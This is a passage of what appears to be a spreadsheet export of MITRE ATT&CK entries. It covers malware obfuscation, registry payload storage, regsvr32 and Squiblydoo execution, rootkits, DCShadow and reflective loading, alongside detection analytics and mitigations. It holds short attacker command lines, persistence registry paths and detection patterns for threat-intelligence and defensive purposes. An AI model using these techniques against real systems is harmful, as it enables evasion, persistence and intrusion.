[FatDuke](https://attack.mitre.org/software/S0512) can use base64 encoding, string stacking, and opaque predicates for obfuscation.(Citation: ESET Dukes October 2019)
FinFisher
[FinFisher](https://attack.mitre.org/software/S0182) is heavily obfuscated in many ways, including through the use of spaghetti code in its functions in an effort to confuse disassembly programs. It also uses a custom XOR algorithm to obfuscate code.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)
Final1stspy
[Final1stspy](https://attack.mitre.org/software/S0355) obfuscates strings with base64 encoding.(Citation: Unit 42 Nokki Oct 2018)
Flagpro
[Flagpro](https://attack.mitre.org/software/S0696) has been delivered within ZIP or RAR password-protected archived files.(Citation: NTT Security Flagpro new December 2021)
FlawedGrace
[FlawedGrace](https://attack.mitre.org/software/S0383) encrypts its C2 configuration files with AES in CBC mode.(Citation: Proofpoint TA505 Jan 2019)
FoggyWeb
[FoggyWeb](https://attack.mitre.org/software/S0661) has been XOR-encoded.(Citation: MSTIC FoggyWeb September 2021)
FunnyDream
[FunnyDream](https://attack.mitre.org/software/S1044) can Base64 encode its C2 address stored in a template binary with the `xyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvw_-` or
`xyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvw_=` character sets.(Citation: Bitdefender FunnyDream Campaign November 2020)
Fysbis
[Fysbis](https://attack.mitre.org/software/S0410) has been encrypted using XOR and RC4.(Citation: Fysbis Dr Web Analysis) 
Gazer
[Gazer](https://attack.mitre.org/software/S0168) logs its actions into files that are encrypted with 3DES. It also uses RSA to encrypt resources.(Citation: Securelist WhiteBear Aug 2017)
Gelsemium
[Gelsemium](https://attack.mitre.org/software/S0666) has the ability to compress its components.(Citation: ESET Gelsemium June 2021)
GoldMax
[GoldMax](https://attack.mitre.org/software/S0588) has written AES-encrypted and Base64-encoded configuration files to disk.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)
GoldenSpy
[GoldenSpy](https://attack.mitre.org/software/S0493)'s uninstaller has base64-encoded its variables. (Citation: Trustwave GoldenSpy2 June 2020)
Goopy
[Goopy](https://attack.mitre.org/software/S0477)'s decrypter have been inflated with junk code in between legitimate API functions, and also included infinite loops to avoid analysis.(Citation: Cybereason Cobalt Kitty 2017)
Grandoreiro
The [Grandoreiro](https://attack.mitre.org/software/S0531) payload has been delivered encrypted with a custom XOR-based algorithm and also as a base64-encoded ZIP file.(Citation: Securelist Brazilian Banking Malware July 2020)(Citation: ESET Grandoreiro April 2020)(Citation: ESET Grandoreiro April 2020)
GravityRAT
[GravityRAT](https://attack.mitre.org/software/S0237) supports file encryption (AES with the key "lolomycin2017").(Citation: Talos GravityRAT)
Green Lambert
[Green Lambert](https://attack.mitre.org/software/S0690) has encrypted strings.(Citation: Objective See Green Lambert for OSX Oct 2021)(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021) 
GreyEnergy
[GreyEnergy](https://attack.mitre.org/software/S0342) encrypts its configuration files with AES-256 and also encrypts its strings.(Citation: ESET GreyEnergy Oct 2018)
Gri</t>
  </si>
  <si>
    <t xml:space="preserve">File Metadata
Depending on the method used to obfuscate API function calls, a file-based signature may be capable of detecting dynamical resolution.(Citation: Huntress API Hash)(Citation: BlackHat API Packers)(Citation: MITRECND FindAPIHash)
Module Load
Monitoring module loads, especially those not explicitly included in import tables, may highlight obfuscated API function calls. Dynamic malware analysis may also expose signs of function obfuscation, such as memory reads that correspond to addresses of API function code within modules.(Citation: BlackHat API Packers)
OS API Execution
Monitor and analyze calls to functions such as  `GetProcAddress()` and `LoadLibrary()` that are associated with dynamically loading API functions.(Citation: Huntress API Hash)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) has used a custom hashing method to resolve APIs used in shellcode.(Citation: Lazarus APT January 2022)
AvosLocker
[AvosLocker](https://attack.mitre.org/software/S1053) has used obfuscated API calls that are retrieved by their checksums.(Citation: Malwarebytes AvosLocker Jul 2021)
Bazar
[Bazar](https://attack.mitre.org/software/S0534) can hash then resolve API calls at runtime.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)
Brute Ratel C4
[Brute Ratel C4](https://attack.mitre.org/software/S1063) can call and dynamically resolve hashed APIs.(Citation: Palo Alto Brute Ratel July 2022)
Pteranodon
[Pteranodon](https://attack.mitre.org/software/S0147) can use a dynamic Windows hashing algorithm to map API components.(Citation: Microsoft Actinium February 2022)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Adversaries may rename abusable binaries to evade detections, but the argument &lt;code&gt;INJECTRUNNING&lt;/code&gt; is required for mavinject.exe to perform [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001) and may therefore be monitored to alert malicious activity.
Process Creation
Monitor the execution and arguments of mavinject.exe. Compare recent invocations of mavinject.exe with prior history of known good arguments and injected DLLs to determine anomalous and potentially adversarial activity.
Disable or Remove Feature or Program
Consider removing mavinject.exe if Microsoft App-V is not used within a given environment.
Execution Prevention
Use application control configured to block execution of mavinject.exe if it is not required for a given system or network to prevent potential misuse by adversaries.
</t>
  </si>
  <si>
    <t xml:space="preserve">WMI Creation
Monitor for the creation of WMI Objects and values that may highlight storage of malicious data such as commands or payloads.
Windows Registry Key Creation
Monitor for the creation of Registry values that may highlight storage of malicious data such as commands or payloads.
Audit
Consider periodic review of common fileless storage locations (such as the Registry or WMI repository) to potentially identify abnormal and malicious data.
Operation CuckooBees
During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors stroed payloads in Windows CLFS (Common Log File System) transactional logs.(Citation: Cybereason OperationCuckooBees May 2022)
APT32
[APT32](https://attack.mitre.org/groups/G0050)'s backdoor has stored its configuration in a registry key.(Citation: ESET OceanLotus Mar 2019)
Turla
[Turla](https://attack.mitre.org/groups/G0010) has used the Registry to store encrypted and encoded payloads.(Citation: ESET Turla PowerShell May 2019)(Citation: Symantec Waterbug Jun 2019)
CHOPSTICK
[CHOPSTICK](https://attack.mitre.org/software/S0023) may store RC4 encrypted configuration information in the Windows Registry.(Citation: FireEye APT28)
Chaes
Some versions of [Chaes](https://attack.mitre.org/software/S0631) stored its instructions (otherwise in a `instructions.ini` file) in the Registry.(Citation: Cybereason Chaes Nov 2020) 
ComRAT
[ComRAT](https://attack.mitre.org/software/S0126) has stored encrypted orchestrator code and payloads in the Registry.(Citation: ESET ComRAT May 2020)(Citation: CISA ComRAT Oct 2020) 
DarkWatchman
[DarkWatchman](https://attack.mitre.org/software/S0673) can store configuration strings, keylogger, and output of components in the Registry.(Citation: Prevailion DarkWatchman 2021)
Exaramel for Windows
[Exaramel for Windows](https://attack.mitre.org/software/S0343) stores the backdoor's configuration in the Registry in XML format.(Citation: ESET TeleBots Oct 2018)
Gelsemium
[Gelsemium](https://attack.mitre.org/software/S0666) can store its components in the Registry.(Citation: ESET Gelsemium June 2021)
Grandoreiro
[Grandoreiro](https://attack.mitre.org/software/S0531) can store its configuration in the Registry at `HKCU\Software\` under frequently changing names including &lt;code&gt;%USERNAME%&lt;/code&gt; and &lt;code&gt;ToolTech-RM&lt;/code&gt;.(Citation: ESET Grandoreiro April 2020)
Mosquito
[Mosquito](https://attack.mitre.org/software/S0256) stores configuration values under the Registry key &lt;code&gt;HKCU\Software\Microsoft\[dllname]&lt;/code&gt;.(Citation: ESET Turla Mosquito Jan 2018)
NETWIRE
[NETWIRE](https://attack.mitre.org/software/S0198) can store its configuration information in the Registry under `HKCU:\Software\Netwire`.(Citation: Red Canary NETWIRE January 2020)
Pillowmint
[Pillowmint](https://attack.mitre.org/software/S0517) has stored a compressed payload in the Registry key &lt;code&gt;HKLM\SOFTWARE\Microsoft\DRM&lt;/code&gt;.(Citation: Trustwave Pillowmint June 2020)
PipeMon
[PipeMon](https://attack.mitre.org/software/S0501) has stored its encrypted payload in the Registry under `HKLM\SOFTWARE\Microsoft\Print\Components\`.(Citation: ESET PipeMon May 2020)
PolyglotDuke
[PolyglotDuke](https://attack.mitre.org/software/S0518) can store encrypted JSON configuration files in the Registry.(Citation: ESET Dukes October 2019)
QUADAGENT
[QUADAGENT](https://attack.mitre.org/software/S0269) stores a session identifier unique to the compromised system as well as a pre-shared key used for encrypting and decrypting C2 communications within a Registry key (such as `HKCU\Office365DCOMCheck`) in the `HKCU` hive.(Citation: Unit 42 QUADAGENT July 2018)
QakBot
[QakBot](https://attack.mitre.org/software/S0650) can store its configuration information in a randomly named subkey under &lt;code&gt;HKCU\Software\Microsoft&lt;/code&gt;.(Citation: Red Canary Qbot)(Citation: Group IB Ransomware September 2020)
RCSession
[RCSession](https://attack.mitre.org/software/S0662) can store its obfuscated configuration file in the Registry under `HKLM\SOFTWARE\Plus` or `HKCU\SOFTWARE\Plus`.(Citation: Trend Micro DRBControl February 2020)(Citation: Profero APT27 December 2020)
REvil
[REvil](https://attack.mitre.org/software/S0496) can save encryption parameters and system information in the Registry.(Citation: Cylance Sodinokibi July 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Intel 471 REvil March 2020)(Citation: Secureworks REvil September 2019)
RegDuke
[RegDuke](https://attack.mitre.org/software/S0511) can store its encryption key in the Registry.(Citation: ESET Dukes October 2019)
ShadowPad
[ShadowPad](https://attack.mitre.org/software/S0596) maintains a configuration block and virtual file system in the Registry.(Citation: Kaspersky ShadowPad Aug 2017)(Citation: TrendMicro EarthLusca 2022)
Sibot
[Sibot](https://attack.mitre.org/software/S0589) has installed a second-stage script in the &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\sibot&lt;/code&gt; registry key.(Citation: MSTIC NOBELIUM Mar 2021)
SysUpdate
[SysUpdate](https://attack.mitre.org/software/S0663) can store its encoded configuration file within &lt;code&gt;Software\Classes\scConfig&lt;/code&gt; in either &lt;code&gt;HKEY_LOCAL_MACHINE&lt;/code&gt; or &lt;code&gt;HKEY_CURRENT_USER&lt;/code&gt;.(Citation: Trend Micro Iron Tiger April 2021)
TYPEFRAME
[TYPEFRAME](https://attack.mitre.org/software/S0263) can install and store encrypted configuration data under the Registry key &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\laxhost.dll&lt;/code&gt; and &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PrintConfigs&lt;/code&gt;.(Citation: US-CERT TYPEFRAME June 2018)
ThreatNeedle
[ThreatNeedle](https://attack.mitre.org/software/S0665) can save its configuration data as a RC4-encrypted Registry key under `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\GameCon`.(Citation: Kaspersky ThreatNeedle Feb 2021)
TinyTurla
[TinyTurla](https://attack.mitre.org/software/S0668) can save its configuration parameters in the Registry.(Citation: Talos TinyTurla September 2021)
Uroburos
[Uroburos](https://attack.mitre.org/software/S0022) can store configuration information for the kernel driver and kernel driver loader components in an encrypted blob typically found at `HKLM:\SOFTWARE\Classes\.wav\OpenWithProgIds.`(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)
Valak
[Valak](https://attack.mitre.org/software/S0476) has the ability to store information regarding the C2 server and downloads in the Registry key &lt;code&gt;HKCU\Software\ApplicationContainer\Appsw64&lt;/code&gt;.(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)(Citation: SentinelOne Valak June 2020)
Volgmer
[Volgmer](https://attack.mitre.org/software/S0180) stores an encoded configuration file in &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Security&lt;/code&gt;.(Citation: US-CERT Volgmer Nov 2017)(Citation: Symantec Volgmer Aug 2014)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Command arguments used before and after the regsvr32.exe invocation may also be useful in determining the origin and purpose of the script or DLL being loaded. (Citation: Carbon Black Squiblydoo Apr 2016)
Module Load
Monitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process.
Network Connection Creation
Monitor for newly constructed network connections that are sent or received by untrusted hosts. 
Process Creation
Use process monitoring to monitor the execution and arguments of regsvr32.exe. Compare recent invocations of regsvr32.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity.
Note: Event IDs are for Sysmon (Event ID 1 - process create) and Windows Security Log (Event ID 4688 - a new process has been created). 
- Analytic 1 is a more generic analytic that looks for suspicious usage of regsvr32.exe, specifically for cases where regsvr32.exe creates child processes that aren’t itself. It’s not likely that this will result in millions of hits, but it does occur during benign activity so some form of baselining would be necessary for this to be useful as an alerting analytic.
- Analytic 2 is around “Squiblydoo”, which is a specific usage of regsvr32.exe to load a COM scriptlet directly from the internet and execute it in a way that bypasses application whitelisting. It looks for regsvr32.exe process creation events that load scrobj.dll via the command-line (which executes the COM scriptlet).
&lt;h4&gt; Analytic 1 - Generic Regsvr32 &lt;/h4&gt;
&lt;code&gt; processes = filter processes where (
  (event_id == "1" OR event_id == "4688") AND
  parent_image_path == "*regsvr32.exe" and exe != "*regsvr32.exe*")&lt;/code&gt;
&lt;h4&gt;Analytic 2 - Squiblydoo&lt;/h4&gt;
&lt;code&gt;processes = filter process where (
  (event_id == "1" OR event_id == "4688") AND
  (process_path == "*regsvr32.exe" and command_line == "*scrobj.dll"))&lt;/code&gt;
Exploit Protection
Microsoft's Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block regsvr32.exe from being used to bypass application control. (Citation: Secure Host Baseline EMET) Identify and block potentially malicious software executed through regsvr32 functionality by using application control (Citation: Beechey 2010) tools, like Windows Defender Application Control(Citation: Microsoft Windows Defender Application Control), AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)
C0015
During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors employed code that used `regsvr32` for execution.(Citation: DFIR Conti Bazar Nov 2021)
Operation Dream Job
During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) used `regsvr32` to execute malware.(Citation: ESET Lazarus Jun 2020)
APT19
[APT19](https://attack.mitre.org/groups/G0073) used Regsvr32 to bypass application control techniques.(Citation: FireEye APT19)
APT32
[APT32](https://attack.mitre.org/groups/G0050) created a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) that used regsvr32.exe to execute a COM scriptlet that dynamically downloaded a backdoor and injected it into memory. The group has also used regsvr32 to run their backdoor.(Citation: ESET OceanLotus Mar 2019)(Citation: FireEye APT32 May 2017)(Citation: Cybereason Cobalt Kitty 2017) 
Blue Mockingbird
[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has executed custom-compiled XMRIG miner DLLs using regsvr32.exe.(Citation: RedCanary Mockingbird May 2020)	
Cobalt Group
[Cobalt Group](https://attack.mitre.org/groups/G0080) has used regsvr32.exe to execute scripts.(Citation: Talos Cobalt Group July 2018)(Citation: Morphisec Cobalt Gang Oct 2018)(Citation: TrendMicro Cobalt Group Nov 2017)
Deep Panda
[Deep Panda](https://attack.mitre.org/groups/G0009) has used regsvr32.exe to execute a server variant of [Derusbi](https://attack.mitre.org/software/S0021) in victim networks.(Citation: RSA Shell Crew)
Inception
[Inception](https://attack.mitre.org/groups/G0100) has ensured persistence at system boot by setting the value &lt;code&gt;regsvr32 %path%\ctfmonrn.dll /s&lt;/code&gt;.(Citation: Kaspersky Cloud Atlas December 2014)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has executed malware with &lt;code&gt;regsvr32s&lt;/code&gt;.(Citation: KISA Operation Muzabi)
Leviathan
[Leviathan](https://attack.mitre.org/groups/G0065) has used regsvr32 for execution.(Citation: Proofpoint Leviathan Oct 2017)
TA551
[TA551](https://attack.mitre.org/groups/G0127) has used regsvr32.exe to load malicious DLLs.(Citation: Unit 42 Valak July 2020)
WIRTE
[WIRTE](https://attack.mitre.org/groups/G0090) has used `regsvr32.exe` to trigger the execution of a malicious script.(Citation: Lab52 WIRTE Apr 2019)
AppleSeed
[AppleSeed](https://attack.mitre.org/software/S0622) can call regsvr32.exe for execution.(Citation: Malwarebytes Kimsuky June 2021)
Astaroth
[Astaroth](https://attack.mitre.org/software/S0373) can be loaded through regsvr32.exe.(Citation: Cybereason Astaroth Feb 2019)
Derusbi
[Derusbi](https://attack.mitre.org/software/S0021) variants have been seen that use Registry persistence to proxy execution through regsvr32.exe.(Citation: ThreatGeek Derusbi Converge)
Dridex
[Dridex](https://attack.mitre.org/software/S0384) can use `regsvr32.exe` to initiate malicious code.(Citation: Red Canary Dridex Threat Report 2021)
EVILNUM
[EVILNUM](https://attack.mitre.org/software/S0568) can run a remote scriptlet that drops a file and executes it via regsvr32.exe.(Citation: ESET EvilNum July 2020) 
Egregor
[Egregor](https://attack.mitre.org/software/S0554) has used regsvr32.exe to execute malicious DLLs.(Citation: JoeSecurity Egregor 2020)
HermeticWizard
[HermeticWizard](https://attack.mitre.org/software/S0698) has used `regsvr32.exe /s /i` to execute malicious payloads.(Citation: ESET Hermetic Wizard March 2022)
Hi-Zor
[Hi-Zor](https://attack.mitre.org/software/S0087) executes using regsvr32.exe called from the [Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001) persistence mechanism.(Citation: Fidelis INOCNATION)
Koadic
[Koadic](https://attack.mitre.org/software/S0250) can use Regsvr32 to execute additional payloads.(Citation: Github Koadic)
More_eggs
[More_eggs](https://attack.mitre.org/software/S0284) has used regsvr32.exe to execute the malicious DLL.(Citation: Security Intelligence More Eggs Aug 2019)
Mori
[Mori](https://attack.mitre.org/software/S1047) can use `regsvr32.exe` for DLL execution.(Citation: DHS CISA AA22-055A MuddyWater February 2022)
Orz
Some [Orz](https://attack.mitre.org/software/S0229) versions have an embedded DLL known as MockDll that uses [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) and regsvr32 to execute another payload.(Citation: Proofpoint Leviathan Oct 2017)
QakBot
[QakBot](https://attack.mitre.org/software/S0650) can use Regsvr32 to execute malicious DLLs.(Citation: Red Canary Qbot)(Citation: Cyberint Qakbot May 2021)(Citation: ATT QakBot April 2021)(Citation: Trend Micro Black Basta October 2022)(Citation: NCC Group Black Basta June 2022)(Citation: Deep Instinct Black Basta August 2022)
Ragnar Locker
[Ragnar Locker](https://attack.mitre.org/software/S0481) has used regsvr32.exe to execute components of VirtualBox.(Citation: Sophos Ragnar May 2020)
RogueRobin
[RogueRobin](https://attack.mitre.org/software/S0270) uses regsvr32.exe to run a .sct file for execution.(Citation: Unit42 DarkHydrus Jan 2019)
Saint Bot
[Saint Bot](https://attack.mitre.org/software/S1018) has used `regsvr32` to execute scripts.(Citation: Malwarebytes Saint Bot April 2021)(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )
Squirrelwaffle
[Squirrelwaffle](https://attack.mitre.org/software/S1030) has been executed using `regsvr32.exe`.(Citation: ZScaler Squirrelwaffle Sep 2021)
Valak
[Valak](https://attack.mitre.org/software/S0476) has used &lt;code&gt;regsvr32.exe&lt;/code&gt; to launch malicious DLLs.(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)
Xbash
[Xbash](https://attack.mitre.org/software/S0341) can use regsvr32 for executing scripts.(Citation: Unit42 Xbash Sept 2018)
</t>
  </si>
  <si>
    <t xml:space="preserve">Drive Modification
Monitor for changes made to drive letters or mount points of data storage devices for unexpected modifications that may be used by rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components.
File Modification
Monitor for changes and the existence of unrecognized DLLs, drivers, devices, services, and to the MBR. (Citation: Wikipedia Rootkit)
Firmware Modification
Monitor for changes made to firmware for unexpected modifications to settings and/or data that may be used by rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Some rootkit protections may be built into anti-virus or operating system software. There are dedicated rootkit detection tools that look for specific types of rootkit behavior. 
APT28
[APT28](https://attack.mitre.org/groups/G0007) has used a UEFI (Unified Extensible Firmware Interface) rootkit known as [LoJax](https://attack.mitre.org/software/S0397).(Citation: Symantec APT28 Oct 2018)(Citation: ESET LoJax Sept 2018)
APT41
[APT41](https://attack.mitre.org/groups/G0096) deployed rootkits on Linux systems.(Citation: FireEye APT41 Aug 2019)(Citation: Crowdstrike GTR2020 Mar 2020)
Rocke
[Rocke](https://attack.mitre.org/groups/G0106) has modified /etc/ld.so.preload to hook libc functions in order to hide the installed dropper and mining software in process lists.(Citation: Anomali Rocke March 2019)
TeamTNT
[TeamTNT](https://attack.mitre.org/groups/G0139) has used rootkits such as the open-source Diamorphine rootkit and their custom bots to hide cryptocurrency mining activities on the machine.(Citation: Trend Micro TeamTNT) (Citation: Cisco Talos Intelligence Group)
Winnti Group
[Winnti Group](https://attack.mitre.org/groups/G0044) used a rootkit to modify typical server functionality.(Citation: Kaspersky Winnti April 2013)
Carberp
[Carberp](https://attack.mitre.org/software/S0484) has used user mode rootkit techniques to remain hidden on the system.(Citation: Prevx Carberp March 2011)
Caterpillar WebShell
[Caterpillar WebShell](https://attack.mitre.org/software/S0572) has a module to use a rootkit on a system.(Citation: ClearSky Lebanese Cedar Jan 2021) 
Drovorub
[Drovorub](https://attack.mitre.org/software/S0502) has used a kernel module rootkit to hide processes, files, executables, and network artifacts from user space view.(Citation: NSA/FBI Drovorub August 2020)
Ebury
[Ebury](https://attack.mitre.org/software/S0377) has used user mode rootkit techniques to remain hidden on the system.(Citation: ESET Ebury Oct 2017)
HIDEDRV
[HIDEDRV](https://attack.mitre.org/software/S0135) is a rootkit that hides certain operating system artifacts.(Citation: ESET Sednit Part 3)
HTRAN
[HTRAN](https://attack.mitre.org/software/S0040) can install a rootkit to hide network connections from the host OS.(Citation: NCSC Joint Report Public Tools)
Hacking Team UEFI Rootkit
[Hacking Team UEFI Rootkit](https://attack.mitre.org/software/S0047) is a UEFI BIOS rootkit developed by the company Hacking Team to persist remote access software on some targeted systems.(Citation: TrendMicro Hacking Team UEFI)
HiddenWasp
[HiddenWasp](https://attack.mitre.org/software/S0394) uses a rootkit to hook and implement functions on the system.(Citation: Intezer HiddenWasp Map 2019)
Hikit
[Hikit](https://attack.mitre.org/software/S0009) is a [Rootkit](https://attack.mitre.org/techniques/T1014) that has been used by [Axiom](https://attack.mitre.org/groups/G0001).(Citation: FireEye Hikit Rootkit) (Citation: FireEye HIKIT Rootkit Part 2) 
Hildegard
[Hildegard](https://attack.mitre.org/software/S0601) has modified /etc/ld.so.preload to overwrite readdir() and readdir64().(Citation: Unit 42 Hildegard Malware)
LoJax
[LoJax](https://attack.mitre.org/software/S0397) is a UEFI BIOS rootkit deployed to persist remote access software on some targeted systems.(Citation: ESET LoJax Sept 2018)
PoisonIvy
[PoisonIvy](https://attack.mitre.org/software/S0012) starts a rootkit from a malicious file dropped to disk.(Citation: Symantec Darkmoon Aug 2005)
Ramsay
[Ramsay](https://attack.mitre.org/software/S0458) has included a rootkit to evade defenses.(Citation: Eset Ramsay May 2020)	
Skidmap
[Skidmap](https://attack.mitre.org/software/S0468) is a kernel-mode rootkit that has the ability to hook system calls to hide specific files and fake network and CPU-related statistics to make the CPU load of the infected machine always appear low.(Citation: Trend Micro Skidmap)
Stuxnet
[Stuxnet](https://attack.mitre.org/software/S0603) uses a Windows rootkit to mask its binaries and other relevant files.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
Umbreon
[Umbreon](https://attack.mitre.org/software/S0221) hides from defenders by hooking libc function calls, hiding artifacts that would reveal its presence, such as the user account it creates to provide access and undermining strace, a tool often used to identify malware.(Citation: Umbreon Trend Micro)
Uroburos
[Uroburos](https://attack.mitre.org/software/S0022) can use its kernel module to prevent its host components from being listed by the targeted system's OS and to mediate requests between user mode and concealed components.(Citation: Kaspersky Turla)(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)
WarzoneRAT
[WarzoneRAT](https://attack.mitre.org/software/S0670) can include a rootkit to hide processes, files, and startup.(Citation: Check Point Warzone Feb 2020)
Winnti for Linux
[Winnti for Linux](https://attack.mitre.org/software/S0430) has used a modified copy of the open-source userland rootkit Azazel, named libxselinux.so, to hide the malware's operations and network activity.(Citation: Chronicle Winnti for Linux May 2019)
Zeroaccess
[Zeroaccess](https://attack.mitre.org/software/S0027) is a kernel-mode rootkit.(Citation: Sophos ZeroAccess)
</t>
  </si>
  <si>
    <t xml:space="preserve">Active Directory Object Creation
Baseline and periodically analyze the Configuration partition of the AD schema and alert on creation of nTDSDSA objects.(Citation: DCShadow Blog)
Active Directory Object Modification
Leverage AD directory synchronization (DirSync) to monitor changes to directory state using AD replication cookies.(Citation: Microsoft DirSync) (Citation: ADDSecurity DCShadow Feb 2018) Also consider monitoring and alerting on the replication of AD objects (Audit Detailed Directory Service Replication Events 4928 and 4929). (Citation: DCShadow Blog)
Network Traffic Content
Monitor and analyze network traffic associated with data replication (such as calls to DrsAddEntry, DrsReplicaAdd, and especially GetNCChanges) between DCs as well as to/from non DC hosts. (Citation: GitHub DCSYNCMonitor)(Citation: DCShadow Blog) DC replication will naturally take place every 15 minutes but can be triggered by an adversary or by legitimate urgent changes (ex: passwords).
User Account Authentication
Investigate usage of Kerberos Service Principal Names (SPNs), especially those associated with services (beginning with “GC/”) by computers not present in the DC organizational unit (OU). The SPN associated with the Directory Replication Service (DRS) Remote Protocol interface (GUID E3514235–4B06–11D1-AB04–00C04FC2DCD2) can be set without logging.(Citation: ADDSecurity DCShadow Feb 2018) A rogue DC must authenticate as a service using these two SPNs for the replication process to successfully complete.
Mimikatz
[Mimikatz](https://attack.mitre.org/software/S0002)’s &lt;code&gt;LSADUMP::DCShadow&lt;/code&gt; module can be used to make AD updates by temporarily setting a computer to be a DC.(Citation: Deply Mimikatz)(Citation: Adsecurity Mimikatz Guide)
</t>
  </si>
  <si>
    <t xml:space="preserve">Module Load
Monitor for artifacts of abnormal process execution. For example, a common signature related to reflective code loading on Windows is mechanisms related to the .NET Common Language Runtime (CLR) -- such as mscor.dll, mscoree.dll, and clr.dll -- loading into abnormal processes (such as notepad.exe)
OS API Execution
Monitor for code artifacts associated with reflectively loading code, such as the abuse of .NET functions such as &lt;code&gt;Assembly.Load()&lt;/code&gt; and [Native API](https://attack.mitre.org/techniques/T1106) functions such as &lt;code&gt;CreateThread()&lt;/code&gt;, &lt;code&gt;memfd_create()&lt;/code&gt;, &lt;code&gt;execve()&lt;/code&gt;, and/or &lt;code&gt;execveat()&lt;/code&gt;.(Citation: 00sec Droppers)(Citation: S1 Old Rat New Tricks)
Script Execution
Similarly, AMSI / ETW traces can be used to identify signs of arbitrary code execution from within the memory of potentially compromised processes.(Citation: MDSec Detecting DOTNET)(Citation: Introducing Donut)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) has changed memory protection permissions then overwritten in memory DLL function code with shellcode, which was later executed via [KernelCallbackTable](https://attack.mitre.org/techniques/T1574/013) hijacking. [Lazarus Group](https://attack.mitre.org/groups/G0032) has also used shellcode within macros to decrypt and manually map DLLs into memory at runtime.(Citation: Lazarus APT January 2022)(Citation: Qualys LolZarus)
BADHATCH
[BADHATCH](https://attack.mitre.org/software/S1081) can copy a large byte array of 64-bit shellcode into process memory and execute it with a call to `CreateThread`.(Citation: Gigamon BADHATCH Jul 2019)
Brute Ratel C4
[Brute Ratel C4](https://attack.mitre.org/software/S1063) has used reflective loading to execute malicious DLLs.(Citation: MDSec Brute Ratel August 2022)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154)'s &lt;code&gt;execute-assembly&lt;/code&gt; command can run a .NET executable within the memory of a sacrificial process by loading the CLR.(Citation: Cobalt Strike Manual 4.3 November 2020)
Cuba
[Cuba](https://attack.mitre.org/software/S0625) loaded the payload into memory using PowerShell.(Citation: McAfee Cuba April 2021) 
Donut
[Donut](https://attack.mitre.org/software/S0695) can generate code modules that enable in-memory execution of VBScript, JScript, EXE, DLL, and dotNET payloads.(Citation: Donut Github)
Emotet
[Emotet](https://attack.mitre.org/software/S0367) has reflectively loaded payloads into memory.(Citation: Binary Defense Emotes Wi-Fi Spreader)
FoggyWeb
[FoggyWeb](https://attack.mitre.org/software/S0661)'s loader has reflectively loaded .NET-based assembly/payloads into memory.(Citation: MSTIC FoggyWeb September 2021)
Gelsemium
[Gelsemium](https://attack.mitre.org/software/S0666) can use custom shellcode to map embedded DLLs into memory.(Citation: ESET Gelsemium June 2021)
IceApple
[IceApple](https://attack.mitre.org/software/S1022) can use reflective code loading to load .NET assemblies into `MSExchangeOWAAppPool` on targeted Exchange servers.(Citation: CrowdStrike IceApple May 2022)
Lokibot
[Lokibot](https://attack.mitre.org/software/S0447) has reflectively loaded the decoded DLL into memory.(Citation: Talos Lokibot Jan 2021) 
PowerSploit
[PowerSploit](https://attack.mitre.org/software/S0194) reflectively loads a Windows PE file into a process.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)
Sardonic
[Sardonic](https://attack.mitre.org/software/S1085) has a plugin system that can load specially made DLLs into memory and execute their functions.(Citation: Bitdefender Sardonic Aug 2021)(Citation: Symantec FIN8 Jul 2023)
ThiefQuest
[ThiefQuest](https://attack.mitre.org/software/S0595) uses various API functions such as &lt;code&gt;NSCreateObjectFileImageFromMemory&lt;/code&gt; to load and link in-memory payloads.(Citation: wardle evilquest partii)
Uroburos
[Uroburos](https://attack.mitre.org/software/S0022) has the ability to load new modules directly into memory using its `Load Modules Mem` command.(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)
WhisperGate
